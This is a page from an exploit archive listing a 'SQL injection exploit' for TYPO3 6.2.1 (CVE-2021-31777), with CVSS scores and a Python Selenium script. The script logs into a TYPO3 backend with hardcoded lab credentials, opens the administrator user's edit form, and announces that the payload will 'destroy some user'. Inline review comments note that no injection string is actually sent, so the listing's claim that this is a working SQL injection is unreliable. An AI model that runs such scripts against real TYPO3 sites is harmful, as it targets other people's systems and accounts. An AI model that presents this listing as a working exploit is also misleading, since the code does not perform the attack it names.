zdtZdt1337DAY-ID-36182
HistoryMay 04, 2021 - 12:00 a.m.

TYPO3 6.2.1 SQL Injection Exploit

2021-05-04 00:00:00
0day.today
47

4.9 Medium

CVSS3

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

HIGH

User Interaction

NONE

Scope

UNCHANGED

Confidentiality Impact

HIGH

Integrity Impact

NONE

Availability Impact

NONE

CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:N/A:N

4 Medium

CVSS2

Access Vector

NETWORK

Access Complexity

LOW

Authentication

SINGLE

Confidentiality Impact

PARTIAL

Integrity Impact

NONE

Availability Impact

NONE

AV:N/AC:L/Au:S/C:P/I:N/A:N

# Exploit Title: TYPO3 6.2.1 allows SQL Injection via a backend user on backend.php
# Author: @nu11secur1ty
# Testing and Debugging: @nu11secur1ty
# Vendor: https://typo3.org/
# Link: https://get.typo3.org/version/6.2.1
# CVE: CVE-2021-31777
# Proof: https://streamable.com/8v7v4i

[+] Exploit Source:

#!/usr/bin/python3
# Author: @nu11secur1ty
# CVE-2021-31777

from selenium import webdriver
import time
import os, sys


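# Vendor: https://typo3.org/
#
# Reproduction helper for the listing above. What the code below visibly does:
#   1. opens the TYPO3 backend login page in a Selenium-driven browser,
#   2. signs in with the backend account configured here,
#   3. opens the record-edit form for `be_users` uid 1 (alt_doc.php).
# No SQL statement or injection string is sent by this script; it only
# navigates an authenticated session to the edit form and then waits.
#
# NOTE(review): the listing's CVSS vector has PR:H, i.e. an authenticated
# backend account is a precondition. Confirm the affected component and the
# fixed versions against the vendor advisory for CVE-2021-31777 rather than
# relying on this listing alone.

# Backend login page of the instance under test (private lab address).
website_link = "http://192.168.1.3/typo3_src-6.2.1/typo3/index.php"

# Backend account used for the login step. These are the author's lab values;
# keep real credentials out of scripts and version control.
username = "nu11secur1ty"
password = "password"

# `name` attributes of the login form's username field, password field and
# submit button, as looked up with find_element_by_name below.
element_for_username = "username"
element_for_password = "p_field"
element_for_submit = "commandLI"

# Record-edit URL opened after login. The string is identical to the one in the
# original listing, which was split across two lines by extraction.
# NOTE(review): the moduleToken value is presumably bound to the author's own
# backend session and would not be valid elsewhere; confirm.
payload_link = (
    "http://192.168.1.3/typo3_src-6.2.1/typo3/alt_doc.php"
    "?edit[be_users][1]=edit"
    "&returnUrl=mod.php%3FM%3Dsystem_BeuserTxBeuser"
    "%26moduleToken%3D56862cd856952bfd539277eebf7b21c2a85ff950#"
)

# Pick exactly one driver; the other two stay commented out.
# browser = webdriver.Safari()   # macOS
browser = webdriver.Chrome()     # needs chromedriver on PATH
# browser = webdriver.Firefox()  # Firefox alternative

try:
    time.sleep(3)
    browser.get(website_link)

    # Fill in and submit the backend login form.
    username_element = browser.find_element_by_name(element_for_username)
    username_element.send_keys(username)
    password_element = browser.find_element_by_name(element_for_password)
    password_element.send_keys(password)
    signInButton = browser.find_element_by_name(element_for_submit)
    signInButton.click()

    # Give the backend time to finish the login redirect, then open the
    # be_users edit form.
    time.sleep(3)
    browser.get(payload_link)

    print("The payload is deployed it is time to destroy some user...\n")
    # Portable replacement for os.system('pause'), which exists only on
    # Windows and otherwise lets the browser close immediately.
    input("Press Enter to close the browser...")
except Exception as exc:
    # The original handler claimed the user had been "destroyed" on *any*
    # failure (missing form element, driver error, network error), which
    # misreports the outcome. Report the actual error instead.
    print("Reproduction did not complete:", repr(exc))
finally:
    # Always end the driver session so an authenticated backend session and
    # the driver process are not left behind when a step fails.
    browser.quit()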

---------------------------------

# Exploit Title: TYPO3 6.2.1 allows SQL Injection via a backend user on backend.php
# Date: 05.02.2021
# Exploit Author idea: @nu11secur1ty
# Exploit Debugging: @nu11secur1ty
# Vendor Homepage: https://typo3.org/
# Software Link: https://get.typo3.org/version/6.2.1

# Steps to Reproduce: https://github.com/nu11secur1ty/CVE-mitre/tree/main/CVE-2021-31777

#  0day.today [2021-11-04]  #
